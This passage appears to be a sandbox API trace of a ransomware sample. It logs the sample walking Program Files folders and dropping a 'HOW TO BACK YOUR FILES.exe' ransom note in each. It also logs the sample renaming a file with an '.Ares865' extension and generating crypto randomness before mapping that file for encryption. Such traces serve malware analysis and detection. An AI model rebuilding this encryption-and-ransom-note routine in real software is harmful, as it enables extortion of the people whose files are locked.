Player\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56b32f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56b32f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.406] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.406] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.407] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Mail") returned="C:\\Program Files\\Windows Mail" [0062.407] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Mail" | out: lpString1="C:\\Program Files\\Windows Mail") returned="C:\\Program Files\\Windows Mail" [0062.407] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.407] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.410] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.410] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x56b32f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56b32f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.411] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.411] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.411] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Mail\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Mail\\en-US") returned="C:\\Program Files\\Windows Mail\\en-US" [0062.411] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Mail\\en-US" | out: lpString1="C:\\Program Files\\Windows Mail\\en-US") returned="C:\\Program Files\\Windows Mail\\en-US" [0062.411] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.411] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Mail\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows mail\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.414] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.414] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56b590a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56b590a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.415] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.415] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.415] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Journal", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Journal") returned="C:\\Program Files\\Windows Journal" [0062.415] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Journal" | out: lpString1="C:\\Program Files\\Windows Journal") returned="C:\\Program Files\\Windows Journal" [0062.415] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.415] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Journal\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows journal\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.419] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.419] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x56b590a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56b590a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.420] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.420] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.420] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Journal\\Templates", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Journal\\Templates") returned="C:\\Program Files\\Windows Journal\\Templates" [0062.420] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Journal\\Templates" | out: lpString1="C:\\Program Files\\Windows Journal\\Templates") returned="C:\\Program Files\\Windows Journal\\Templates" [0062.420] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.420] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Journal\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows journal\\templates\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.425] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.425] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x56b590a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56b590a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.425] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.425] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.425] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Journal\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Journal\\en-US") returned="C:\\Program Files\\Windows Journal\\en-US" [0062.425] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Journal\\en-US" | out: lpString1="C:\\Program Files\\Windows Journal\\en-US") returned="C:\\Program Files\\Windows Journal\\en-US" [0062.425] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.425] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Journal\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows journal\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.430] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.430] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x56b7f200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56b7f200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.430] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.430] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.431] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Defender", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Defender") returned="C:\\Program Files\\Windows Defender" [0062.431] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Defender" | out: lpString1="C:\\Program Files\\Windows Defender") returned="C:\\Program Files\\Windows Defender" [0062.431] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.431] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Defender\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows defender\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.434] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.434] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Defender\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56b7f200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56b7f200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.434] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.434] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.435] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Defender\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Defender\\en-US") returned="C:\\Program Files\\Windows Defender\\en-US" [0062.435] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Defender\\en-US" | out: lpString1="C:\\Program Files\\Windows Defender\\en-US") returned="C:\\Program Files\\Windows Defender\\en-US" [0062.435] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.435] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Defender\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows defender\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.448] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.448] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Defender\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56b7f200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56b7f200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.448] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.448] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.449] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Uninstall Information", iMaxLength=260 | out: lpString1="C:\\Program Files\\Uninstall Information") returned="C:\\Program Files\\Uninstall Information" [0062.449] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Uninstall Information" | out: lpString1="C:\\Program Files\\Uninstall Information") returned="C:\\Program Files\\Uninstall Information" [0062.449] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.449] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Uninstall Information\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\uninstall information\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.453] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.453] FindFirstFileW (in: lpFileName="C:\\Program Files\\Uninstall Information\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x56ba5360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56ba5360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.454] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.454] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.454] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Reference Assemblies", iMaxLength=260 | out: lpString1="C:\\Program Files\\Reference Assemblies") returned="C:\\Program Files\\Reference Assemblies" [0062.454] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Reference Assemblies" | out: lpString1="C:\\Program Files\\Reference Assemblies") returned="C:\\Program Files\\Reference Assemblies" [0062.454] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.454] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\reference assemblies\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.458] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.458] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56ba5360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56ba5360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.458] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.458] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.458] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft") returned="C:\\Program Files\\Reference Assemblies\\Microsoft" [0062.458] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft" | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft") returned="C:\\Program Files\\Reference Assemblies\\Microsoft" [0062.458] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.458] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\reference assemblies\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.462] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.462] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56bcb4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56bcb4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.462] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.462] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.462] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework", iMaxLength=260 | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework" [0062.462] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework" | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework" [0062.462] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.462] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.466] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.466] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56bcb4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56bcb4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.466] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.466] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.466] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5", iMaxLength=260 | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5" [0062.466] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5" | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5" [0062.466] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.473] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.473] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56bcb4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56bcb4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.473] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.473] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.476] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList", iMaxLength=260 | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList" [0062.476] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList" | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList" [0062.476] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.476] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.479] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.479] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56bf1620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56bf1620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.480] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.480] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.480] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.Ares865") returned 99 [0062.480] MoveFileExW (lpExistingFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.Ares865" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml.ares865"), dwFlags=0x1) returned 1 [0062.482] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.Ares865" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0062.482] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=24259) returned 1 [0062.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0062.483] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0062.483] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.483] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0062.484] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x61d0, lpName=0x0) returned 0x118 [0062.486] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61d0) returned 0x1a0000 [0062.488] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0062.489] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.489] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0062.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.490] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0", iMaxLength=260 | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0") 